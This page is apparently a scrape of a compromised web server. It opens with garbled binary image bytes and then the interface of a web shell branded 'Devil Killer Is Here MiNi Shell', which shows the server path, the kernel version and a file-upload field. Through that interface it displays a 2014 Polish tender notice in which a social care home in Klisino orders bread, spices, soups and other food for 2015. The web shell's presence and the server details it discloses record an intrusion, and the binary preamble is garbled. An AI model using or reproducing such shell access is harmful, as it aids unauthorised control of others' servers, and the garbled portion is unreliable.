JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141125/385682-N-2014.html

<p class="kh_header"><b>Lisięcice: DOSTAWA RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH DLA DOMU POMOCY SPOŁECZNEJ W KLISINIE I PODLEGŁYCH ZAKŁADÓW /RADYNIA, BOBOLUSZKI, DZBAŃCE I BLISZCZYCE/ W 2015 r.</b><br>
<b>Numer ogłoszenia: 385682 - 2014; data zamieszczenia: 25.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Klisinie , Klisino 100, 48-118 Lisięcice, woj. opolskie, tel. 077 4857593, faks 077 4857594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dps-klisino.pl, bip.dps.powiatglubczycki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> NIE DOTYCZY</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH DLA DOMU POMOCY SPOŁECZNEJ W KLISINIE I PODLEGŁYCH ZAKŁADÓW /RADYNIA, BOBOLUSZKI, DZBAŃCE I BLISZCZYCE/ W 2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH DLA DOMU POMOCY SPOŁECZNEJ W KLISINIE I PODLEGŁYCH ZAKŁADÓW /RADYNIA, BOBOLUSZKI, DZBAŃCE I BLISZCZYCE/ W 2015 r.
Przedmiotem zamówienia jest dostawa różnych produktów spożywczych dla Domu Pomocy Społecznej w Klisinie i podległych zakładów (Radynia, Boboluszki, Dzbańce i Bliszczyce) w 2015 r.
ORIENTACYJNE ZAPOTRZEBOWANIE NA 2015 ROK
Część I                  RÓŻNE ARTYKUŁY SPOŻYWCZE 
Majonez (zaw. tłuszcz. 25%)  kg	1032
Kawa zbożowa kg	746
Herbata granulowana kg	413
Cukier  kg	13603
Cukier waniliowy kg	28
Proszek do pieczenia kg	5
Kakao ciemne (niskotłuszczowe 10-12%)  kg	100
Budyń śmietankowy kg	83
Kisiel owocowy kg	219
Galaretka owocowa kg	162
Cynamon mielony kg	7
Drożdże kg	12
Mak kg	95
Miód kg	864
Żelatyna kg 	8
Czekolada nadziewana kg	334
Biszkopty kg	134
Kwasek cytrynowy kg	32
Soda oczyszczona kg	2
Ocet 10% l	331
Przyprawa Magi w płynie l	981
Sól kg	1246
Majeranek kg	14
Musztarda kg	790
Ketchup łagodny (koncentrat pomidorowy min. 35%, przyprawy: kolendra, tymianek i inne) kg	902
Ziele angielskie kg	12
Liście laurowe kg	7
Przyprawa warzywna (warzywa suszone 15%, marchew, cebula, seler pietruszka, por, papryka i inne
(Kucharek, Vegeta, Delikat lub inny nie gorszy) kg                   	788
Przyprawa do kurczaka (sól, papryka, curry, czosnek, pomidory, pieprz i inne) kg	21
Przyprawa do ryb kg	6
Przyprawa do mięsa (sól, gorczyca, czosnek, cebula, pieprz, kminek, kolendra, papryka i inne)   kg	19
Pieprz mielony kg	54
Makaron nitki  4 -jajeczny kg	4134
Makaron gruby (kolanka, muszelki, świderki) kg	1414
Makaron gruby spaghetti kg	98
Cukier puder kg	60
Rodzynki kg	16
Makaron tortellini z mięsem kg	124
Kawa naturalna - mielona kg	511
Wafle suche okrągłe szt.	164
Przyprawa czosnek granulowany kg	14
Przyprawa gyros (sól, papryka słodka, czosnek, cebula, kminek, pieprz, chilli, kolendra, tymianek i inne)  kg	10
Przyprawa do flaków kg	3
Makaron zacierka kg	264
Przyprawa - papryka mielona kg	38
Przyprawa - gałka muszkatołowa mielona kg	3
Herbata owocowa (saszetki) kg	171
Wafle kakaowe np. grześki itp. kg	569
Baton czekoladowy np. Pawełek itp. kg	67
Wiórki kokosowe kg	11
Orzechy włoskie  kg	14
Ciastka nadziewane np. Delicje kg	304
Zupa błyskawiczna tzw. chińska     kg 	37
Herbatniki kg	303
Migdały całe kg	6
Woda mineralna gazowana 1,5 l        szt.	910
Woda mineralna niegazowana 1,5 l    szt.	300
Cukierki czekoladowe kg	46
Masa krówkowa kg	17
Napój typu Kubuś	241
Makaron lasagne kg	37
Pasztet drobiowy - puszka kg	454
Konserwa wieprzowa - mielonka kg	583


Część II             ZUPY I SOSY
Zupa - żur  kg	64
Zupa - grzybowa kg	23
Zupa - grochowa kg	4
Zupa - barszcz biały kg	14
Zupa - ogonowa kg	58
Zupa - ogórkowa kg	16
Sos pieczeniowy kg	37
Sos pieczarkowy kg	58
Sos grzybowy kg	5
Sos boloński kg	3
Zupa - barszcz czerwony kg	31
Zupa - pieczarkowa  kg	82
Zupa - fasolowa  kg	35
Bulion drobiowo-wołowy kg	50


Część III              PIECZYWO
Chleb pszenno-żytni (krojony) kg 	52568
Baton (krojony) kg	6843
Rogal kg	141
Bułka zwykła kg	995
Bułka tarta kg	679
Chleb graham - ciemny (krojony) kg	3747
Bułka słodka kg	1 280
Bułka graham kg	414
Ciasto - pączek z marmoladą i cukrem pudrem kg 	536
Suchary kg	25
Chleb tostowy (krojony) kg	2595
Chleb graham - wieloziarnisty biały (krojony) kg	6509
Ciasto - sernik kg	96
Ciasto - jabłecznik kg	57
Ciasto - babka kg	164
Ciasto - makowiec kg	94
Ciasto - fale Dunaju kg	30
Ciasto - brzoskwiniowe kg	11
Ciasto - krówka kg	259
Ciastka kruche - luz kg	397


OPIS PRZEDMIOTU ZAMÓWIENIA 

Kakao (10-12% tłuszczu)	Kakao - (kakao w proszku) jest wyrobem otrzymanym przez sproszkowanie oczyszczonych, odtłuszczonych i prażonych ziaren
Kakaowych. Kakao mało tłuste- o zawartości tłuszczu kakaowego od 10 do 12% suchej masy. Konsystencja - Proszek sypki, jednolity, dopuszcza się lekkie zbrylenia łatwo rozsypujące się.
Barwa - Jasnobrązowa do brunatno czerwonej.
Kawa naturalna mielona	Wyrób pakowany w paczki próżniowe wykonane z materiałów dopuszczonych do kontaktu z żywnością
Barwa - Od jasno- do ciemnobrązowej w zależności od stopnia
upalenia, praktycznie jednolita
Wygląd - Konsystencja sypka, o praktycznie wyrównanym stopniu
granulacji, bez trwałych zbryleń.
Smak i zapach - Charakterystyczny dla kawy palonej, naturalny, bez zapachu i smaku pleśni, zjełczenia, ziaren śmierdzących i smaku kawy
Rio oraz innych obcych.
Herbata owocowa (saszetki)	Herbata powinna być nie zepsuta i praktycznie wolna od zanieczyszczeń obcych, pakowana w torebki o masie 2g wykonane z materiałów dopuszczonych do kontaktu z żywnością. Napar powinien posiadać smak i zapach charakterystyczny dla danego gatunku owocu.
Czekolada nadziewana 	Czekolada nadziewana - czekolada uformowana z masy czekoladowej naturalnej, mlecznej, śmietankowej lub białej w ilości nie mniejszej niż 40% masy wyrobu, z nadzieniem.
Powierzchnia - gładka z wyraźnym odciskiem wzoru formy, lekko błyszcząca, bez wyraźnych plam, zadrapań, pęknięć, może być zdobiona naturalnymi dodatkami, dopuszcza się jaśniejsze smugi, w przypadku wyrobów z masy czekoladowej mlecznej dopuszcza się powierzchnię lekko matową
Barwa -Brązowa lub w przypadku skorupki z czekolady mlecznej -
jasnobrązowa lub w przypadku skorupki z czekolady białej - kremowa.
Konsystencja - Skorupki jednolita, twarda.
Nadzienia charakterystyczna dla użytego nadzienia.
Zawartość cukrów ogółem jako cukier inwertowany w suchej masie, % (m/m), nie więcej niż 65
Baton czekoladowy 	Wyroby czekoladowane - wyroby, których rdzeń stanowią korpusy miękkie, karmelki nadziewane, drażetki, wyroby wschodnie lub inne korpusy, a całą zewnętrzną warstwę lub jej część stanowi czekolada, dla której wymagania podano w odpowiednich przepisach.
Powierzchnia - Z połyskiem, bez plam, zasiwień, zadrapań lub pęknięć, w przypadku wyrobów w kuwerturze mlecznej dopuszcza się powierzchnie lekko matową, pokrycie rdzenia całkowite lub częściowe w zależności od rodzaju wyrobu; powierzchnia dolna matowa, dopuszcza się do 2,5 % ilościowo wyrobów o nieznacznie uszkodzonej powierzchni lub niecałkowicie pokrytym spodzie; dla wyrobów o rdzeniu z owoców i wyrobów o rdzeniu miękkim i fantazyjnym kształcie dopuszcza się punktowe nie oblanie kuwerturą
Konsystencja - Jednolita, twarda.
Smakowitość - Właściwa dla użytej masy czekoladowej i rdzenia, bez smaku i zapachu obcego
Sos grzybowy - pieczarkowy	Koncentrat sosu grzybowego - produkt spożywczy otrzymywany z odwodnionych, zagęszczonych lub przetworzonych surowców roślinnych, zwierzęcych lub ich mieszanin, z dodatkiem lub bez naturalnych przypraw roślinnych, spożywczych dodatków smakowo - zapachowych, substancji wzmacniających smak i zapach, substancji poprawiających strukturę produktu, naturalnych lub identycznych z naturalnymi barwników organicznych oraz innych substancji dopuszczonych do stosowania zgodnie z obowiązującym prawem, z którego otrzymuje się sos, stanowiący dodatek do potraw.
Wyrób sypki, z widocznymi lub nie kawałkami użytych składników typowymi dla danego asortymentu koncentratu sosu, dopuszczalne nietrwałe zbrylenia wynikające z wsadu surowcowego, rozprowadzające
się w czasie przyrządzania.
Zapach - Właściwy dla surowców użytych w czasie produkcji, niedopuszczalne
zapachy obce
Sos Boloński 	Koncentrat sosu bolońskiego - produkt spożywczy otrzymywany z odwodnionych, zagęszczonych lub przetworzonych surowców roślinnych, zwierzęcych lub ich mieszanin, z dodatkiem lub bez naturalnych przypraw roślinnych, spożywczych dodatków smakowo - zapachowych, substancji wzmacniających smak i zapach, substancji poprawiających strukturę produktu, naturalnych lub identycznych z naturalnymi barwników organicznych oraz innych substancji zgodnie z obowiązującym prawem, z którego otrzymuje się sos, stanowiący dodatek do potraw.
Wygląd - wyrób sypki, z widocznymi lub nie kawałkami użytych składników typowymi dla danego asortymentu koncentratu sosu, dopuszczalne nietrwałe zbrylenia wynikające z wsadu surowcowego, rozprowadzające się w czasie przyrządzania.
Zapach - właściwy dla surowców użytych w czasie produkcji, niedopuszczalne zapachy obce.
Baraszcz czerwony 	Barszcz czerwony instant - produkt spożywczy otrzymywany z odwodnionych, zagęszczonych lub przetworzonych surowców roślinnych, zwierzęcych lub ich mieszanin, a dodatkiem naturalnych przypraw roślinnych, spożywczych dodatków smakowo - zapachowych, substancji wzmacniających smak i zapach, substancji poprawiających strukturę produktu, naturalnych lub identycznych z naturalnymi barwników organicznych oraz innych substancji dopuszczonych do stosowania zgodnie z obowiązującym prawem, który po zalaniu wrzątkiem i zamieszaniu stanowi zupę - I danie obiadowe gotowe.
Produkt sypki, z widocznymi kawałkami dodatków deklarowanych w
nazwie, dopuszczalne nietrwałe zbrylenia wynikające z wsadu surowcowego, rozprowadzające się w czasie przyrządzania.
Właściwy dla surowców użytych w czasie produkcji, niedopuszczalne
zapachy obce.
Żur	Koncentrat zupy - produkt spożywczy otrzymywany z odwodnionych, zagęszczonych lub przetworzonych surowców roślinnych, zwierzęcych lub ich mieszanin, z dodatkiem lub bez naturalnych przypraw roślinnych, spożywczych dodatków smakowo - zapachowych, substancji wzmacniających smak i zapach, substancji poprawiających strukturę produktu, naturalnych lub identycznych z naturalnymi barwników organicznych oraz innych substancji dopuszczonych do stosowania zgodnie z obowiązującym prawem, z którego otrzymuje się zupę - I danie obiadowe.
Wygląd - Wyrób sypki, z widocznymi kawałkami ziemniaków, warzyw od 5 do 20 mm, mięsa lub teksturatu sojowego, dopuszczalne nietrwałe zbrylenia wynikające z wsadu surowcowego, rozprowadzające się w czasie przyrządzania
Zapach - Właściwy dla surowców użytych w czasie produkcji, niedopuszczalne zapachy obce.
Przyprawa do mięsa 	Przyprawa do mięsa - produkt otrzymany przez wymieszanie wysuszonych, rozdrobnionych lub całych surowców takich jak: kory, korzenie kłącza, ziela, liście, kwiaty, pąki, owoce i nasiona przeznaczone do poprawienia smaku, zapachu i wyglądu produktów spożywczych.
Konsystencja - Sypka, w zależności od składu surowcowego dopuszcza się niewielkie zbrylenia.
Barwa - Niejednolita, właściwa składnikom.
Przyprawa do ryb	Przyprawa do ryb - produkt otrzymany przez wymieszanie wysuszonych, rozdrobnionych lub całych surowców takich jak: kory, korzenie kłącza, ziela, liście, kwiaty, pąki, owoce i nasiona przeznaczone do poprawienia smaku, zapachu i wyglądu produktów spożywczych.
Konsystencja - Sypka, w zależności od składu surowcowego dopuszcza się niewielkie zbrylenia.
Barwa - Niejednolita, właściwa składnikom.
Smak - Charakterystyczny dla składników.
Przyprawa do drobiu	Przyprawa do drobiu - produkt otrzymany przez wymieszanie wysuszonych, rozdrobnionych lub całych surowców takich jak:
kory, korzenie kłącza, ziela, liście, kwiaty, pąki, owoce i nasiona przeznaczone do poprawienia smaku, zapachu i wyglądu
produktów spożywczych.
Konsystencja - Sypka, w zależności od składu surowcowego dopuszcza się niewielkie zbrylenia.
Barwa - Niejednolita, właściwa składnikom.
Smak - Charakterystyczny dla składników.
Zapach - Aromatyczny, charakterystyczny dla danej mieszanki.
Przyprawa uniwersalna - warzywna 	Przyprawa do drobiu - produkt otrzymany przez wymieszanie wysuszonych, rozdrobnionych lub całych surowców takich jak: kory, korzenie kłącza, ziela, liście, kwiaty, pąki, owoce i nasiona przeznaczone do poprawienia smaku, zapachu i wyglądu produktów spożywczych.
Konsystencja - Sypka, w zależności od składu surowcowego dopuszcza się niewielkie zbrylenia.
Barwa - Niejednolita, właściwa składnikom.
Smak - Charakterystyczny dla składników.
Zapach - Aromatyczny, charakterystyczny dla danej mieszanki.
Ocet	Ocet - produkt przeznaczony do spożycia, otrzymany wyłącznie w procesie biologicznym dwóch fermentacji, alkoholowej i octowej z surowców pochodzenia rolniczego.
Ocet powinien być wyprodukowany z następujących surowców:
- przedestylowanego alkoholu pochodzenia rolniczego,
- innych produktów pochodzenia rolniczego, zawierających skrobię, cukry lub skrobię i cukry, włączając, lecz nie ograniczając go do ziarna zboż, słodu jęczmiennego, serwatki.
Zawartość kwasów ogółem wyrażona jako bezwodny kwas octowy (g) nie mniej niż na 1000ml - 50.
Kwasek cytrynowy 	Kwasek cytrynowy - produkt spożywczy o konsystencji sypkich kryształów.
Konsystencja - Kryształy sypkie, bez zlepów i grudek lub proszek.
Barwa - Kryształy bezbarwne lub proszek biały.
Zapach - Bez obcego zapachu.
Smak - silnie kwaśny. 
Cynamon 	Cynamon - wysuszona kora zdjęta z gałęzi różnych gatunków drzewa rodzaju Cinnammonum, przygotowana w formie kawałków lub proszku.
Barwa - Jasno-brązowa do brunatnej, jednolita.
Konsystencja - Sypka, zmielony proszek przesiewający się bez reszty przez sito o oczkach 1mm
Zapach - Swoisty, intensywny, bez zapachów obcych
Smak - Słodko-piekący, bez posmaków obcych
Żelatyna 	Żelatyna spożywcza produkt otrzymany z odtłuszczonych kości i miękkich odpadów poubojowych zwierząt rzeźnych przez przeprowadzenie nierozpuszczalnego kolagenu w glutynę.
Majonez 	Wyrób otrzymany przez zemulgowanie oleju roślinnego jadalnego (olejów roślinnych jadalnych) w fazie wodnej, w obecności żółtka jaja kurzego. Dopuszcza się stosowanie następujących surowców i dodatków: jaj kurzych i ich przetworów, cukru, soli, mleka i jego przetworów, kwasów spożywczych (octowego, cytrynowego, mlekowego, jabłkowego i winowego), a także ich soli sodowych i potasowych, musztardy, owoców, warzyw, soków owocowych i warzywnych i ich koncentratów oraz substancji dodatkowych dozwolonych przy produkcji majonezu.
Konsystencja - jednolita, gładka, niedopuszczalne rozwarstwienie lub obecność widocznych kropel oleju
Barwa - jasnokremowa do jasnożółtej; dopuszczalna obecność przebarwień pochodzących z rozdrobnionych przypraw, niedopuszczalne zmiany barwy, np. ciemnienie
Zapach - właściwy, charakterystyczny dla majonezu, niedopuszczalna
obecność obcych zapachów.
Smak - charakterystyczny dla majonezu, niedopuszczalne obce posmaki
Musztarda 	Musztarda - przyprawa otrzymana z ziarna gorczycy, wody, soli, cukru, octu i innych składników smakowo-zapachowych, bez dodatku lub z dodatkiem substancji dodatkowych zgodnie z obowiązującym prawem.
Stan opakowania - opakowanie zamknięte, nieuszkodzone, bez śladów wycieku zawartości.
Barwa i wygląd - właściwa dla zastosowanych surowców i ewentualnie dodanych składników smakowo-zapachowych; dopuszcza się obecność czarnych punktów w przypadku stosowania gorczycy czarnej.
Konsystencja - masa półpłynna z nieznaczną wyczuwalnością cząstek gorczycy i przypraw.
Zapach - właściwy dla musztardy, z wyczuwalnym zapachem przypraw i użytych składników smakowo-zapachowych; bez zapachów obcych.
Smak - Piekący, o zróżnicowanym natężeniu: od lekkiego dla musztardy stołowej i kremskiej do silnego dla musztardy sarepskiej, zaś w przypadku musztardy kremskiej słodkawy; dopuszcza się piekący, z wyczuwalnym smakiem użytych składników smakowo-zapachowych oraz wyraźnie słony w przypadku musztardy delikatesowej rodzaju Dijon; bez obcych posmaków.
Ketchup	Ketchup - produkt otrzymany ze świeżych lub i przetworzonych pomidorów (owoce rozdrobnione, przecier, koncentrat) i innych warzyw (np. cebula, czosnek, seler, papryka) utrwalonych metodami fizycznymi, względnie chemicznymi, z dodatkiem przypraw aromatyczno-smakowych lub/i wyciągów z warzyw lub/i przypraw, dozwolonych środków słodzących, soli, kwasów spożywczych i ewentualnym dodatkiem substancji zagęszczających, utrwalone termicznie lub chemicznie.
Barwa - Typowa dla użytych surowców, zmieniona procesem technologicznym.
Zapach i smak - Charakterystyczny dla poszczególnych sosów w zależności od użytych składników, bez obcych zapachów i posmaków.
Konsystencja i wygląd - Półpłynna do gęstej, ewentualnie z widocznymi cząstkami przypraw, kawałkami warzyw, owoców lub grzybów zależnie od rodzaju i sposobu przetwarzania zastosowanych surowców i półproduktów; w przypadku sosów ketchup jednorodna, przetarta masa bez ziarnistości.
Zawartość ekstraktu ogólnego oznaczonego refraktometrycznie, ułamek masowy w %, nie mniej niż 35.
Budyń	Produkt spożywczy w postaci sypkiej otrzymany przez wymieszanie substancji zagęszczających, substancji aromatycznych naturalnych, identycznych z naturalnymi lub syntetycznych, barwników spożywczych, z dodatkiem lub bez dodatku substancji słodzących, substancji poprawiających strukturę produktu, naturalnych spożywczych dodatków smakowych, oraz innych substancji dozwolonych zgodnie z aktualnie obowiązującym prawem.
Wygląd - produkt sypki, dopuszczalne występowanie zbryleń składników rozprowadzających się podczas przyrządzania deserów oraz ciemniejszych cząstek pochodzących z zastosowanych surowców.
Konsystencja - charakterystyczna dla danego deseru.
Smak i zapach - zbliżony do deklarowanego w nazwie deseru, bez
obcych smaków i zapachów.
Galaretka 	Produkt spożywczy w postaci sypkiej otrzymany przez wymieszanie cukru, substancji żelująco - zagęszczających, barwników spożywczych, kwasów spożywczych, substancji smakowo-zapachowych naturalnych lub syntetycznych oraz innych substancji dozwolonych zgodnie z aktualnie obowiązującym prawem.
Wygląd - produkt sypki, dopuszczalne występowanie zbryleń składników rozprowadzających się podczas przyrządzania deserów oraz ciemniejszych cząstek pochodzących z zastosowanych surowców.
Konsystencja - charakterystyczna dla danego deseru.
Barwa - zbliżona do barwy owocu deklarowanego w nazwie deseru
Smak i zapach - zbliżony do deklarowanego w nazwie deseru, bez obcych smaków i zapachów.
Kisiel 	Produkt spożywczy w postaci sypkiej otrzymany przez wymieszanie substancji zagęszczających, barwników spożywczych, kwasów spożywczych, substancji smakowo-zapachowych naturalnych lub syntetycznych z dodatkiem lub bez dodatku substancji słodzących oraz innych substancji dozwolonych zgodnie z aktualnie obowiązującym prawem.
Wygląd - produkt sypki, dopuszczalne występowanie zbryleń składników rozprowadzających się podczas przyrządzania deserów oraz ciemniejszych cząstek pochodzących z zastosowanych surowców
Konsystencja - charakterystyczna dla danego deseru
Barwa - zbliżona do barwy owocu deklarowanego w nazwie deseru.
Smak i zapach - zbliżony do deklarowanego w nazwie deseru, bez obcych smaków i zapachów.
Woda mineralna - gazwoana 	Woda podziemna wydobywana jednym lub kilkoma otworami naturalnymi lub wierconymi, pierwotnie czysta pod względem chemicznym i mikrobiologicznym, charakteryzująca się stabilnym składem mineralnym oraz właściwościami mającymi znaczenie fizjologiczne, powodującymi korzystne oddziaływanie na zdrowie ludzi, średnio nasycona dwutlenkiem węgla. 
Barwa - bezbarwny, klarowny płyn, bez osadów i innych zanieczyszczeń.
Smak i zapach - bezwonna, niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Opakowanie 1,5 l
Woda minerala - niegazowana 	Woda podziemna wydobywana jednym lub kilkoma otworami naturalnymi lub wierconymi, pierwotnie czysta pod względem chemicznym i mikrobiologicznym, charakteryzująca się stabilnym składem mineralnym oraz właściwościami mającymi znaczenie fizjologiczne, powodującymi korzystne oddziaływanie na zdrowie ludzi, nie nasycona dwutlenkiem węgla.
Barwa - bezbarwny, klarowny płyn, bez osadów i innych zanieczyszczeń.
Smak i zapach - bezwonna, niedopuszczalny smak i zapach świadczący o nieświeżości lub inny obcy. Opakowanie 1,5 l
Sól 	Sucha, niezawilgocona, czysta, o śnieżnobiałej bieli, bez grudek, sypka, bez obcych smaków i zapachów.
Herbata granulowana 	Sucha niezawilgocona, o aromatycznym smaku i zapachu. 
Kawa zbożowa (rozpuszczalna)	Sypka, bez grudek, niezawilgocona, sucha
Drożdże	Bez obcych smaków i zapachów.
Liść laurowy 	Wysuszone liście zebrane z drzewa laurowego (Laurus nobilis L.)
Brawa - Jasno-zielona do oliwkowo-zielonej z możliwym odcieniem mlecznym
Konsystencja - łamliwa.
Zapach - swoisty, bez zapachów obcych.
Majeranek	Przesortowane, poddane procesowi ocierania, w wyniku którego zostały wyeliminowane łodygi.
Barwa - Szarozielonooliwkowa 
Zapach - Aromatyczny, silny, bez zapachów obcych
Smak - Korzenny, gorzkawy
Ziele angielskie	Wysuszone, wykształcone, lecz niedojrzale owoce (jagody) rośliny Pimenta officinalis L.
Brawa - Swoista, jasno-brązowa do ciemno-brunatnej
Kształt - Kulisty z pozostałością 4-działowego kielicha oraz pozostałością szypułki
Zapach - Swoisty, intensywny, bez zapach  obcych
Smak - Swoisty, intensywny, bez zapach  obcych
Makaron gruby (kolanka, muszelki, świderki)	4 jajeczny - makaron suchy, niezawilgocona, czysty, bez obcych smaków i zapachów, niepołamany. 
Makaron nitka 	4 jajeczny - makaron suchy, niezawilgocona, czysty, bez obcych smaków i zapachów, niepołamany.
Makaron zacierka 	makaron suchy, niezawilgocona, czysty, bez obcych smaków i zapachów, niepołamany.
Przyprawa w płynie typu Magi 	Produkt spożywczy otrzymywany w wyniku hydrolizy surowców roślinnych lub zwierzęcych o dużej zawartości białka, głównie zawierający zhydrolizowane białko w postaci aminokwasów, sól kuchenną oraz wodę, w postaci płynu
Barwa - Od jasnobrązowej do brunatnej
Wygląd i konsystencja - płynna.
Smak - Charakterystyczny dla hydrolizatu białkowego, łagodny, nie dopuszczalny smak gorzki
Rodzynki	Wygląd - kształt zachowany, jednorodny, barwa typowa dla gatunku i odmiany, z dopuszczalnym pociemnieniem. Tekstura i konsystencja elastyczna, nie zlepiająca się przy ucisku, bez zbryleń. Smak i zapach charakterystyczny dla produktu bez smaków i zapachów obcych. Zawartość wody nie więcej niż10-35%. 

W skład Domu Pomocy Społecznej w Klisinie wchodzą następujące filie: 
- DPS Branice (83 mieszkańców),
- DPS Boboluszki (76),
- DPS Radynia (75),
- DPS Dzbańce (199),
- DPS Bliszczyce (81),
- DPS Głubczyce (29), 
- DPS Kietrz (ok. 71)
W Klisinie zamieszkuje 126 mieszkańców. 
Wszystkie znajdują się na terenie powiatu głubczyckiego.
